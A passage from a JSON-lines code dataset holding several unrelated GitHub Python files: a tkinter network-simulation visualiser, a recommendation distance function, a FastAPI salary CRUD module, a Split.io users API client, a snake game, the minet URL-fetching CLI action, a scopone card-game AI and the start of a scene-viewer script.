up\n\t\tconn.close()\n#conn.close()","repo_name":"eliahvo/presenter-app","sub_path":"presenterServer.py","file_name":"presenterServer.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31833330100","text":"import time\n\nfrom time_profiler import timer\nfrom memory_profiler import profile\n\nfrom api import function\nfrom api import saxParser\nimport tkinter as tk\nfrom time import sleep\nfrom GUI import move\nfrom GUI import zoom\nfrom GUI import gui\nimport asyncio\n\nMAX = 5.0\nCOUNT_TIME = 0\nDELETE_ON_OFF = True\nSLEEP_COUNT = 0.0\nDELAY_SLEEP=0.0\ndef create_node(board, handler):\n \"\"\"\n Function for draw nodes to board\n :param board: Tkinter board\n :param handler: Sax parser handler with data\n \"\"\"\n global COUNT_TIME\n COUNT_TIME = 0\n for i in handler.node:\n # +MAX for biggest size\n coord = float(i[2]), float(i[3]), float(i[2])+MAX, float(i[3])+MAX\n\n y = list(coord)\n for c in range(len(y)):\n y[c] = y[c]*MAX\n coord = tuple(y)\n\n id_node = board.create_oval(coord, fill=\"blue\")\n\n #/2 for input ID to node\n id_text = board.create_text(float((coord[0]+coord[2])/2.0), float((coord[1]+coord[3])/2.0), text=handler.nodeDesc[str(i[0])], fill=\"white\")\n function.node_id.update({i[0] : [id_node, id_text]})\n\n # move board\n board.bind(\"\", lambda event: move.move_start(event, board))\n board.bind(\"\", lambda event: move.move_move(event, board))\n\n board.bind(\"\", lambda event: move.pressed2(event, board))\n board.update()\n\n\ndef create_transport_line(board, handler, iteration):\n \"\"\"\n Function for draw line between 2 nodes\n :param board: Tkinter board\n :param handler: Sax parser handler with data\n \"\"\"\n\n for t in handler.transport[iteration:]:\n if not function.simulationOnOff:\n break\n\n\n helper_update(handler)\n\n global DELETE_ON_OFF\n DELETE_ON_OFF = True\n call_async(board)\n gui_update(handler=handler)\n\n function.count_iteration = function.count_iteration + 1\n #check change position\n if function.count_iteration in handler.nodeChangePos:\n new_node_create(board, handler, function.count_iteration)\n\n if not check_transport(handler=handler,iteration=function.count_iteration-1,iterationNext=function.count_iteration):\n first, last = t[0], t[1]\n coordFirst = handler.node[int(first)].copy()\n color = 'green'\n if last == \"-\":\n\n coordLast = handler.node[int(first)].copy()\n coordLast[3] = coordLast[3] + 5\n color = 'red'\n\n else:\n coordLast = handler.node[int(last)].copy()\n\n\n #### append id of line which send data\n new_line_id = board.create_line((coordFirst[2] + 2.5) * MAX, (coordFirst[3] + 2.5) * MAX,\n (coordLast[2] + 2.5) * MAX, (coordLast[3] + 2.5) * MAX, arrow=tk.LAST,\n width=3, fill=color)\n\n function.line_id_array.append(new_line_id)\n\n else:\n if len(function.help_time_line_array)>1:\n function.help_time_line_array.pop(len(function.help_time_line_array)-2)\n\n try:\n if (float(function.help_time_line_array[-1])) - (time.time() - function.t1_start - SLEEP_COUNT)>0:\n\n sleep(float(function.help_time_line_array[-1]) - (time.time() - function.t1_start - SLEEP_COUNT))\n except:\n None\n\n\n if function.count_iteration%150==0:\n board.update()\n\n t1_stop = time.time()\n\n\n #print(\"Elapsed time during the whole program in seconds:\",\n # t1_stop - function.t1_start)\n board.update()\n\n\nasync def call(board):\n await asyncio.gather(time_line_delete(), delete_line(board))\ndef call_async(board):\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(call(board))\nasync def time_line_delete():\n global COUNT_TIME\n global DELETE_ON_OFF\n global SLEEP_COUNT\n if len(function.time_line_array) > 1:\n sleep_time = float(function.time_line_array[COUNT_TIME+1]) - float(function.time_line_array[COUNT_TIME])\n\n if sleep_time > 0:\n SLEEP_COUNT += function.speed\n await asyncio.sleep(sleep_time+function.speed)\n else:\n await asyncio.sleep(0)\n COUNT_TIME = COUNT_TIME + 1\n DELETE_ON_OFF = False\n\nasync def delete_line(board):\n\n while DELETE_ON_OFF:\n\n try:\n while ((time.time() - function.t1_start - SLEEP_COUNT) - (float(function.help_time_line_array[0]))) >= 0.5:\n\n function.help_time_line_array.pop(0)\n board.delete(function.line_id_array[0])\n function.line_id_array.pop(0)\n board.update()\n\n except:\n None\n await asyncio.sleep(0)\n\n\n\n\n\ndef create_step_line(board, handler, iteration, step):\n delete_all(board)\n\n check = False\n color = 'green'\n trans = []\n if step==\"f\":\n trans = handler.transport[iteration]\n function.count_iteration = function.count_iteration + 1\n\n\n if step==\"b\":\n trans = handler.transport[iteration - 2]\n function.count_iteration = function.count_iteration - 1\n\n\n first, last = trans[0], trans[1]\n coordFirst = handler.node[int(first)].copy()\n\n if last == \"-\":\n coordLast = handler.node[int(first)].copy()\n coordLast[3] = coordLast[3] + 5\n color = 'red'\n\n else:\n coordLast = handler.node[int(last)].copy()\n\n gui_update(handler=handler)\n\n # check change position\n if function.count_iteration in handler.nodeChangePos:\n new_node_create(board, handler, function.count_iteration)\n\n if function.line_id != \"null\":\n board.delete(function.line_id)\n\n function.line_id = board.create_line((coordFirst[2] + 2.5) * MAX, (coordFirst[3] + 2.5) * MAX,\n (coordLast[2] + 2.5) * MAX, (coordLast[3] + 2.5) * MAX, arrow=tk.LAST, width=3,\n fill=color)\n\n board.update()\n\n\n\n\n\n\ndef check_transport(handler, iteration, iterationNext):\n try:\n\n trans = handler.transport[iteration].copy()\n transNext = handler.transport[iterationNext].copy()\n\n if trans == transNext:\n\n return True\n else:\n return False\n except:\n return False\n\n\ndef new_node_create(board, handler, iteration):\n for x in handler.nodePos:\n if x[3]==iteration:\n #delete node\n deleteNode= function.node_id.get(x[0])\n board.delete(deleteNode[0])\n board.delete(deleteNode[1])\n\n #create new node\n\n handler.node[x[0]][2] = x[1]\n handler.node[x[0]][3] = x[2]\n node = handler.node[x[0]]\n coord = float(node[2]), float(node[3]), float(node[2]) + MAX, float(node[3]) + MAX\n\n y = list(coord)\n for c in range(len(y)):\n y[c] = y[c] * MAX\n coord = tuple(y)\n\n id_node = board.create_oval(coord, fill=\"blue\")\n # /2 for input ID to node\n id_text = board.create_text(float((coord[0] + coord[2]) / 2.0), float((coord[1] + coord[3]) / 2.0),\n text=handler.nodeDesc[str(x[0])], fill=\"white\")\n function.node_id.update({x[0]: [id_node, id_text]})\n\n\n\ndef gui_update(handler):\n gui.stepLabel.config(text=\"Steps: \" + str(function.count_iteration+1) + \"/\" + str(function.max_iteration))\n gui.textLabel.delete('1.0', tk.END)\n gui.textLabel.insert(tk.END, handler.metaInfo[function.count_iteration])\n gui.timeLabel.config(text=\"Time: \" + handler.transportTime[function.count_iteration] + \" s\")\n\ndef helper_update(handler):\n function.time_line_array.append(handler.transportTime[function.count_iteration])\n function.help_time_line_array.append(handler.transportTime[function.count_iteration])\n\n\ndef delete_all(board):\n for x in function.line_id_array:\n board.delete(x)\n function.time_line_array = []\n","repo_name":"pribula329/DP_NS3_Pribula","sub_path":"api/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37458596139","text":"'''\nCreated on Dec 30 2013\n@author: Kelly Chan\n\nPython Version: V2.7.3\n\nCourse: Python Data Mining\nLesson: User Recommendation\nMethods: Minkowski Distance (Euclidean)\n\n'''\n\ndef minkowski(rating1, rating2, r):\n \"\"\"Computes the Minkowski distance.\n Both rating1 and rating2 are dictionaries of the form\n {'The Strokes': 3.0, 'Slightly Stoopid': 2.5}\"\"\"\n distance = 0\n commonRatings = False\n for key in rating1:\n if key in rating2:\n distance += pow(abs(rating1[key] - rating2[key]), r)\n commonRatings = True\n if commonRatings:\n return pow(distance, 1/r)\n else:\n return -1 #Indicates no ratings in common","repo_name":"neoconstantine7/Python","sub_path":"examples/RecommendationSystem/minkowski.py","file_name":"minkowski.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26011801570","text":"from sqlalchemy.orm import Session\nfrom attendance import models, schemas\nfrom fastapi import HTTPException\n\n#utility\ndef get_base_salarys(db:Session, user_id: int, current: models.User):\n if not current.hr:\n raise HTTPException(status_code=401, detail=\"You are not hr.\")\n db_salary = db.query(models.BaseSalary).filter(models.BaseSalary.user_id==user_id).all()\n return db_salary\n\n#hr\ndef create_base_salary(db:Session, base_salary: schemas.BaseSalaryCreate, current: models.User):\n if base_salary.salary <= 0:\n raise HTTPException(status_code=400, detail=\"Wrong salary.\")\n if base_salary.self_percent > 6 or base_salary.self_percent < 0:\n raise HTTPException(status_code=400, detail=\"Wrong self percent.\")\n if not current.hr:\n raise HTTPException(status_code=401, detail=\"You are not hr.\")\n user = db.query(models.User).filter_by(models.User.id==base_salary.user_id, models.User.status==0).first()\n if not user:\n raise HTTPException(status_code=404, detail=\"User not found or resigned.\")\n db_salary = models.BaseSalary(salary=base_salary.salary, user_id= base_salary.user_id, date= base_salary.date,\n self_percent= base_salary.self_percent)\n db.add(db_salary)\n db.commit()\n db.refresh(db_salary)\n return get_base_salarys(db, user_id=base_salary.user_id, current=current)","repo_name":"auyu0408/attendance_backend","sub_path":"attendance/crud/base_salary.py","file_name":"base_salary.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20101088864","text":"from urllib.parse import urlencode\n\nfrom splitcli.split_apis import http_client\n\n# URLs\n\ndef users_url():\n return f\"users\"\n\ndef user_url(user_id):\n base_url = users_url()\n return f\"{base_url}/{user_id}\"\n\ndef invite_user(email, group_ids):\n groups = list(map(lambda x: {\"id\":x, \"type\":\"group\"}, group_ids))\n content = {\n \"email\": email,\n \"groups\":groups\n }\n http_client.post(users_url(), content)\n\ndef list_users(status=None,group_id=None):\n all_users = []\n next_marker = None\n # Stop once a batch is smaller than the limit\n while True:\n result = list_users_batch(next_marker, status, group_id)\n next_marker = result['nextMarker']\n data = result['data']\n if len(data) != 0:\n all_users.extend(data)\n if next_marker is None:\n break\n return all_users\n\ndef list_users_batch(next=None, status=None, group_id=None):\n path = users_url()\n query = {}\n if next is not None:\n query[\"after\"] = next\n if status is not None:\n query[\"status\"] = status\n if group_id is not None:\n query[\"group_id\"] = group_id\n if query:\n path += f\"?{urlencode(query)}\"\n return http_client.get(path)\n\ndef get_user_by_email(email):\n users = list_users(status=\"ACTIVE\")\n match = list(filter(lambda x: x['email'] == email, users))\n if len(match) == 1:\n return match[0]\n else:\n return None\n\ndef get_user(user_id):\n path = user_url(user_id)\n return http_client.get(path)","repo_name":"splitio-examples/splitcli","sub_path":"splitcli/split_apis/users_api.py","file_name":"users_api.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"1947707075","text":"import pygame\r\n\r\npygame.init()\r\n\r\nrow = 10\r\ncol = 10\r\n\r\nclass Node():\r\n def __init__(self, posx: int, posy: int, next):\r\n self.posx = posx\r\n self.posy = posy\r\n self.next = next\r\n\r\nclass Board():\r\n def __init__(self):\r\n self.board = [([0] * col)] * row\r\n self.board[row/2][col/2] = 1\r\n\r\nclass Move():\r\n def __init__(self, vx: int, vy: int):\r\n self.vx = vx\r\n self.vy = vy\r\n\r\nUP = Move(0,-1)\r\nDOWN = Move(0,1)\r\nRIGHT = Move(1,0)\r\nLEFT = Move(-1,0)\r\n\r\nclass Snake():\r\n def __init__(self, first: Node):\r\n self.first = first\r\n\r\n def move(self, direction: Move, growing: bool):\r\n first = self.first\r\n if direction != None:\r\n posx = direction.vx + first.posx\r\n posy = direction.vy + first.posy\r\n node = Node(posx,posy,first)\r\n self.first = node\r\n if not growing:\r\n while(node.next.next != None):\r\n node = node.next\r\n node.next = None\r\n","repo_name":"PaccoTan/SimpleSnake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7776721880","text":"def f2(m):\n s=0\n f=m\n for k in range(5):\n x=m%10\n s=s+x**4\n m=m//10\n if s==f:\n return True\n else:\n return False\ni=int(input())\nprint(f2(i))","repo_name":"Hyper-Han/Learn-Python","sub_path":"综合/27四叶玫瑰数.py","file_name":"27四叶玫瑰数.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41058572116","text":"# =============================================================================\n# Minet Fetch CLI Action\n# =============================================================================\n#\n# Action reading an input CSV file line by line and fetching the urls found\n# in the given column. This is done in a respectful multithreaded fashion to\n# optimize both running time & memory.\n#\nimport os\nimport csv\nimport sys\nimport gzip\nfrom io import StringIO\nfrom os.path import join, dirname, isfile\nfrom collections import Counter\nfrom tqdm import tqdm\nfrom uuid import uuid4\nfrom ural import is_url\n\nfrom minet.contiguous_range_set import ContiguousRangeSet\n\nfrom minet.fetch import multithreaded_fetch\nfrom minet.utils import (\n grab_cookies,\n parse_http_header,\n PseudoFStringFormatter\n)\nfrom minet.cli.reporters import report_error\nfrom minet.cli.utils import (\n custom_reader,\n open_output_file,\n die,\n LazyLineDict\n)\n\nOUTPUT_ADDITIONAL_HEADERS = [\n 'line',\n 'resolved',\n 'status',\n 'error',\n 'filename',\n 'encoding'\n]\n\nCUSTOM_FORMATTER = PseudoFStringFormatter()\n\n\ndef fetch_action(namespace):\n\n # Are we resuming\n resuming = namespace.resume\n\n if resuming and not namespace.output:\n die([\n 'Cannot --resume without specifying -o/--output.'\n ])\n\n # Do we need to fetch only a single url?\n if namespace.file is sys.stdin and is_url(namespace.column):\n namespace.file = StringIO('url\\n%s' % namespace.column)\n namespace.column = 'url'\n\n # If we are hitting a single url we enable contents_in_report\n if namespace.contents_in_report is None:\n namespace.contents_in_report = True\n\n input_headers, pos, reader = custom_reader(namespace.file, namespace.column)\n filename_pos = input_headers.index(namespace.filename) if namespace.filename else None\n indexed_input_headers = {h: p for p, h in enumerate(input_headers)}\n\n selected_fields = namespace.select.split(',') if namespace.select else None\n selected_pos = [input_headers.index(h) for h in selected_fields] if selected_fields else None\n\n # HTTP method\n http_method = namespace.method\n\n # Cookie grabber\n get_cookie = None\n if namespace.grab_cookies:\n get_cookie = grab_cookies(namespace.grab_cookies)\n\n # Global headers\n global_headers = None\n if namespace.headers:\n global_headers = {}\n\n for header in namespace.headers:\n k, v = parse_http_header(header)\n global_headers = v\n\n # Reading output\n output_headers = (list(input_headers) if not selected_pos else [input_headers[i] for i in selected_pos])\n output_headers += OUTPUT_ADDITIONAL_HEADERS\n\n if namespace.contents_in_report:\n output_headers.append('raw_content')\n\n flag = 'w'\n\n if namespace.output is not None and resuming and isfile(namespace.output):\n flag = 'r+'\n\n output_file = open_output_file(namespace.output, flag=flag)\n\n output_writer = csv.writer(output_file)\n\n if not resuming:\n output_writer.writerow(output_headers)\n else:\n\n # Reading report to know what need to be done\n _, rpos, resuming_reader = custom_reader(output_file, 'line')\n\n resuming_reader_loading = tqdm(\n resuming_reader,\n desc='Resuming',\n dynamic_ncols=True,\n unit=' lines'\n )\n\n already_done = ContiguousRangeSet()\n\n for line in resuming_reader_loading:\n index = line[rpos]\n\n already_done.add(int(index))\n\n # Loading bar\n total = namespace.total\n\n if total is not None and resuming:\n total -= len(already_done)\n\n loading_bar = tqdm(\n desc='Fetching pages',\n total=total,\n dynamic_ncols=True,\n unit=' urls'\n )\n\n def url_key(item):\n line = item[1]\n url = line[pos].strip()\n\n if not url:\n return\n\n # Url templating\n if namespace.url_template:\n return namespace.url_template.format(value=url)\n\n return url\n\n def request_args(url, item):\n cookie = None\n\n # Cookie\n if get_cookie:\n cookie = get_cookie(url)\n\n # Headers\n headers = None\n\n if global_headers:\n headers = global_headers\n\n return {\n 'method': http_method,\n 'cookie': cookie,\n 'headers': headers\n }\n\n def write_output(index, line, resolved=None, status=None, error=None,\n filename=None, encoding=None, data=None):\n\n if selected_pos:\n line = [line[p] for p in selected_pos]\n\n line.extend([\n index,\n resolved or '',\n status or '',\n error or '',\n filename or '',\n encoding or ''\n ])\n\n if namespace.contents_in_report:\n line.append(data or '')\n\n output_writer.writerow(line)\n\n errors = 0\n status_codes = Counter()\n\n target_iterator = enumerate(reader)\n\n if resuming:\n target_iterator = (pair for pair in target_iterator if not already_done.stateful_contains(pair[0]))\n\n multithreaded_iterator = multithreaded_fetch(\n target_iterator,\n key=url_key,\n request_args=request_args,\n threads=namespace.threads,\n throttle=namespace.throttle\n )\n\n for result in multithreaded_iterator:\n line_index, line = result.item\n\n if not result.url:\n\n write_output(\n line_index,\n line\n )\n\n loading_bar.update()\n continue\n\n response = result.response\n data = response.data if response is not None else None\n\n content_write_flag = 'wb'\n\n # Updating stats\n if result.error is not None:\n errors += 1\n else:\n if response.status >= 400:\n status_codes[response.status] += 1\n\n postfix = {'errors': errors}\n\n for code, count in status_codes.most_common(1):\n postfix[str(code)] = count\n\n loading_bar.set_postfix(**postfix)\n loading_bar.update()\n\n # No error\n if result.error is None:\n\n filename = None\n\n # Building filename\n if data:\n if filename_pos is not None or namespace.filename_template:\n if namespace.filename_template:\n filename = CUSTOM_FORMATTER.format(\n namespace.filename_template,\n value=line[filename_pos] if filename_pos is not None else None,\n ext=result.meta['ext'],\n line=LazyLineDict(indexed_input_headers, line)\n )\n else:\n filename = line[filename_pos] + result.meta['ext']\n else:\n # NOTE: it would be nice to have an id that can be sorted by time\n filename = str(uuid4()) + result.meta['ext']\n\n # Standardize encoding?\n encoding = result.meta['encoding']\n\n if data and namespace.standardize_encoding or namespace.contents_in_report:\n if encoding is None or encoding != 'utf-8' or namespace.contents_in_report:\n data = data.decode(encoding if encoding is not None else 'utf-8', errors='replace')\n encoding = 'utf-8'\n content_write_flag = 'w'\n\n # Writing file on disk\n if data and not namespace.contents_in_report:\n\n if namespace.compress:\n filename += '.gz'\n\n resource_path = join(namespace.output_dir, filename)\n resource_dir = dirname(resource_path)\n\n os.makedirs(resource_dir, exist_ok=True)\n\n with open(resource_path, content_write_flag) as f:\n\n # TODO: what if standardize_encoding + compress?\n f.write(gzip.compress(data) if namespace.compress else data)\n\n # Reporting in output\n resolved_url = response.geturl()\n\n write_output(\n line_index,\n line,\n resolved=resolved_url if resolved_url != result.url else None,\n status=response.status,\n filename=filename,\n encoding=encoding,\n data=data\n )\n\n # Handling potential errors\n else:\n error_code = report_error(result.error)\n\n write_output(\n line_index,\n line,\n error=error_code\n )\n\n # Closing files\n if namespace.output is not None:\n output_file.close()\n","repo_name":"AleksiKnuutila/minet-fork","sub_path":"cli/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17628965327","text":"'''\nThe set [1, 2, 3, ..., n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order\n, we get the following sequence for n = 3:\n\n\"123\"\n\"132\"\n\"213\"\n\"231\"\n\"312\"\n\"321\"\nGiven n and k, return the kth permutation sequence.\n'''\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n res = ''\n nums = [x for x in range(1, n+1)]\n fac = 1\n top = n-1\n for i in range(2, n):\n fac*=i\n\n while len(nums)>0:\n group = (k-1)//fac\n k%=fac\n fac//=top\n top = top-1 if top-1>1 else 1 # top = top-1>1 ? top-1 : 1\n res+=str(nums[group])\n nums.pop(group)\n return res\n \n \n\ndef main():\n n=8\n k=20161\n print(Solution.getPermutation(Solution(), n, k))\n\nif __name__=='__main__':\n main()\n","repo_name":"BoTWGitHub/LeecodePractice","sub_path":"python/LeetCode Quiz/No60.py","file_name":"No60.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41306517488","text":"n=[list(map(int,input().split())) for _ in range(5)]\r\nimport sys\r\nsys.setrecursionlimit(10**8)\r\nanswer=[]\r\ndef dfs(x,y,num):\r\n global answer\r\n if len(num)==6:\r\n answer.append(int(num))\r\n return\r\n dx=[-1,1,0,0]\r\n dy=[0,0,1,-1]\r\n for i in range(4):\r\n xx=x+dx[i]\r\n yy=y+dy[i]\r\n if 0<=xx<5 and 0<=yy<5:\r\n dfs(xx,yy,num+str(n[xx][yy]))\r\n\r\nfor i in range(5):\r\n for j in range(5):\r\n dfs(i,j,'')\r\nanswer.sort()\r\nanswer=set(answer)\r\nprint(len(answer))","repo_name":"harimyong/baekjoon","sub_path":"백준/Silver/2210. 숫자판 점프/숫자판 점프.py","file_name":"숫자판 점프.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25640105350","text":"# encoding=utf8\n\"\"\" \n--------------------------------------------------------------------------------\nDescriptive Name : Queensland.py\nAuthor : Shengli Sui\t\t\t\t\t\t\t\t \nContact Info : ssui@purdue.edu\nDate Written : June 29,0216\nDescription : Parse cameras on the Queensland, AUS traffic camera website\nCommand to run script: python Queensland.py\nOutput : list_Queensland.txt\nNote : \nOther files required by : N/A\nthis script and where \nlocated\n\n----For Parsing Scripts---------------------------------------------------------\nWebsite Parsed : http://www.tmr.qld.gov.au/Traffic-cameras-by-location.aspx\nIn database (Y/N) : Y\nDate added to Database : June 29, 2016\n--------------------------------------------------------------------------------\n\"\"\"\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.select import Select\nimport urllib\nimport urllib2\n\nimport re\nimport json\nimport time\nimport codecs\n\n\n\nclass Brisbane:\n def __init__(self):\n self.driver = webdriver.Firefox()\n self.f = open('list_Queensland.txt', 'w')\n \n def gAPI(self, locat, city, link, f):\n time.sleep(0.2);\n api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + locat + \", \" + city + \",Queensland, Australia\"\n api = api.replace(' ','')\n ''' use API to find the latitude and longitude'''\n response = urllib2.urlopen(api).read()\n #load by json module\n parsed_json= json.loads(response)\n content= parsed_json['results']\n #extract latitude and longitude from the API json code\n loc= content[0]\n geo = loc['geometry']\n location2 = geo['location']\n lat = location2['lat']\n lng = location2['lng']\n #change lat and lng to string\n string_lat = str(lat)\n string_lng = str(lng)\n #print string_lat,string_lng\n locat = 'AU'+'#'+city+'#'+link+'#'+string_lat+'#'+string_lng\n f.write(locat.encode('utf-8').replace(\" \",\"\").replace(\"\\n\",'')+'\\n')\n \n def gAPI_city(self, locat, city, link, f):\n time.sleep(0.2)\n api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + city + \",Queensland, Australia\"\n api = api.replace(' ','')\n ''' use API to find the latitude and longitude'''\n response = urllib2.urlopen(api).read()\n #load by json module\n parsed_json= json.loads(response)\n content= parsed_json['results']\n #extract latitude and longitude from the API json code\n loc= content[0]\n geo = loc['geometry']\n location2 = geo['location']\n lat = location2['lat']\n lng= location2['lng']\n #change lat and lng to string\n string_lat = str(lat)\n string_lng = str(lng)\n #print string_lat,string_lng\n locat = 'AU'+'#'+city+'#'+link+'#'+string_lat+'#'+string_lng\n f.write(locat.encode('utf-8').replace(\" \",\"\").replace(\"\\n\",'')+'\\n')\n \n def getData(self):\n self.driver.get(\"http://www.tmr.qld.gov.au/Traffic-cameras-by-location.aspx\")\n place=self.driver.find_elements_by_css_selector(\"a[href*='/Traffic-cameras-by-location/Traffic-cameras.aspx?region']\")\n numplace=len(place)\n countplace=0\n while countplace= giocata[0].value:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\tpar.append((n == len(carte_mano))*flag)\n\t\t\t\n\t\t\t\t#non 7 a terra\n\t\t\t\tn=0\n\t\t\t\tif len(self.prese(widgets.Card(0,7),carte_terra+[giocata[0]])) != 0:\n\t\t\t\t\tn=1\n\t\t\t\tpar.append(n*flag)\n\t\t\t\n\t\t\t\t#presa dopo\n\t\t\t\tpresa_dopo = 0\n\t\t\t\tfor carta in carte_mano:\n\t\t\t\t\tif carta != giocata[0]:\n\t\t\t\t\t\tif len(self.prese(carta,carte_terra+[giocata[0]])) != 0:\n\t\t\t\t\t\t\tpresa_dopo += 1\n\t\t\t\tpar.append(presa_dopo*flag)\n\t\t\t\n\t\t\t\t#scopa avversario\n\t\t\t\tvalore_terra = giocata[0].value\n\t\t\t\tfor carta in carte_terra:\n\t\t\t\t\tvalore_terra += carta.value\n\t\t\t\tpar.append((valore_terra <= 10)*flag)\n\n\t\t\t\t### no_prese=0\n\t\t\t\tflag = not no_prese\n\t\t\t\t#scopa\n\t\t\t\tpar.append((len(giocata[1]) == len(carte_terra))*flag)\n\t\t\t\n\t\t\t\t#scopa avversario\n\t\t\t\tvalore_terra = 0\n\t\t\t\tfor carta in carte_terra:\n\t\t\t\t\tif not carta in giocata[1]:\n\t\t\t\t\t\tvalore_terra += carta.value\n\t\t\t\tif giocata[1] == []:\n\t\t\t\t\tvalore_terra += giocata[0].value\n\t\t\t\tpar.append((valore_terra <= 10)*flag)\n\t\t\t\n\t\t\t\t### se non si prende niente\n\t\t\t\tflag = (not no_prese)*(len(giocata[1]) == 0)\n\t\t\t\n\t\t\t\t#non denaro\n\t\t\t\tpar.append((giocata[0].suit != 0)*flag)\n\t\t\t\n\t\t\t\t#non 7\n\t\t\t\tpar.append((giocata[0].value != 7)*flag)\n\t\t\t\n\t\t\t\t#carta piu' bassa\n\t\t\t\tfor carta in carte_mano:\n\t\t\t\t\tif carta.value > giocata[0].value:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\tpar.append((n == len(carte_mano))*flag)\n\t\t\t\n\t\t\t\t### se si prende qualcosa\n\t\t\t\tflag = (not no_prese)*(len(giocata[1]) != 0)\n\t\t\t\tcarte_da_prendere=list(giocata[1])\n\t\t\t\tcarte_da_prendere.append(giocata[0])\n\t\t\t\n\t\t\t\t#numero carte prese\n\t\t\t\tpar.append(len(carte_da_prendere)*flag)\n\t\t\t\n\t\t\t\ttmp = [0,0,0,0,0]\n\t\t\t\tfor carta in carte_da_prendere:\n\t\t\t\t\t#se denaro\n\t\t\t\t\tif carta.suit == 0:\n\t\t\t\t\t\ttmp[0] += 1\n\t\t\t\t\t#se sette\n\t\t\t\t\tif carta.value == 7:\n\t\t\t\t\t\ttmp[1] += 1\n\t\t\t\t\t\t#se sette bello\n\t\t\t\t\t\tif carta.suit == 0:\n\t\t\t\t\t\t\ttmp[2] += 1\n\t\t\t\t\t#se sei\n\t\t\t\t\tif carta.value == 6:\n\t\t\t\t\t\ttmp[3] += 1\n\t\t\t\t\t#se asso\n\t\t\t\t\tif carta.value == 1:\n\t\t\t\t\t\ttmp[4] += 1\n\t\t\t\tfor v in tmp:\n\t\t\t\t\tpar.append(v*flag)\n\t\t\t\t\n\t\t\t\tvalue = self.players[self.giocatore].value(par, ai_values)\n\t\t\t\tif value > migliore[2]:\n\t\t\t\t\tmigliore[0], migliore[1], migliore[2] = giocata[0], giocata[1], value\n\t\t\n\t\tself.players[self.giocatore].update_memory(migliore[1], len(migliore[1])==carte_terra)\n\t\tself.gioca_carta(self.giocatore,migliore[0],migliore[1])\n","repo_name":"marcoscarpetta/scopy","sub_path":"src/libscopy/scopone.py","file_name":"scopone.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6423436858","text":"###########################################\n# Keyboard Control Instruction #\n#-----------------------------------------#\n# R: Switch /. #\n# W/A/S/D: Move. #\n# Q/E: Turn perspective. #\n# Z/C: Around the ring. #\n# 1~8: Move to observation pose. #\n# SPACE: Next data. #\n# ENTER: Re-render the canvas. # \n###########################################\n\nimport numpy as np\nimport cv2\nimport argparse\nimport parse_config\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom srgqn import SRGQN\nfrom dataset import GqnDatasets\nnp.set_printoptions(precision=3)\n\ndef draw_camera(img_map, v, color=(1,0,0), fov=50, map_size=240, fill_size=8, line_size=400, center_line=True):\n global view_inverse\n img_map = cv2.flip(img_map, 0)\n pos = (fill_size+int(map_size/2*(1+v[0])), fill_size+int(map_size/2*(1+v[1])))\n ang = np.arctan2(v[4], v[3])\n if view_inverse:\n ang += np.pi\n pts1 = (int(pos[0] + line_size*np.cos(ang)), int(pos[1] + line_size*np.sin(ang)))\n pts2 = (int(pos[0] + line_size*np.cos(ang+np.deg2rad(fov/2))), int(pos[1] + line_size*np.sin(ang+np.deg2rad(fov/2))))\n pts3 = (int(pos[0] + line_size*np.cos(ang-np.deg2rad(fov/2))), int(pos[1] + line_size*np.sin(ang-np.deg2rad(fov/2))))\n #\n cv2.circle(img_map, pos, 5, color, 3)\n if center_line:\n cv2.line(img_map, pos, pts1, color, 1)\n else:\n cv2.line(img_map, pts2, pts3, color, 2)\n cv2.line(img_map, pos, pts2, color, 2)\n cv2.line(img_map, pos, pts3, color, 2)\n #\n img_map = cv2.flip(img_map, 0)\n return img_map\n\ndef gaussian_heatmap(mean, std, size):\n img = np.zeros(size, dtype=np.float32)\n mean_pix = (mean[0]*size[0], mean[1]*size[1])\n std_pix = std * size[0]\n for i in range(size[1]):\n for j in range(size[0]):\n temp = ((i-mean_pix[0])**2 + (j-mean_pix[1])**2)/std_pix**2\n img[j,i,:] = np.exp(-0.5 * temp) / (2*np.pi*std_pix**2)\n return img\n\n############ Parameter Parsing ############\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', nargs='?', type=str ,help='Experiment name.')\nparser.add_argument(\"-i\", \"--view_inverse\", help=\"view inverse\", action=\"store_true\")\nparser.add_argument(\"-k\", \"--keyboard\", help=\"human control\", 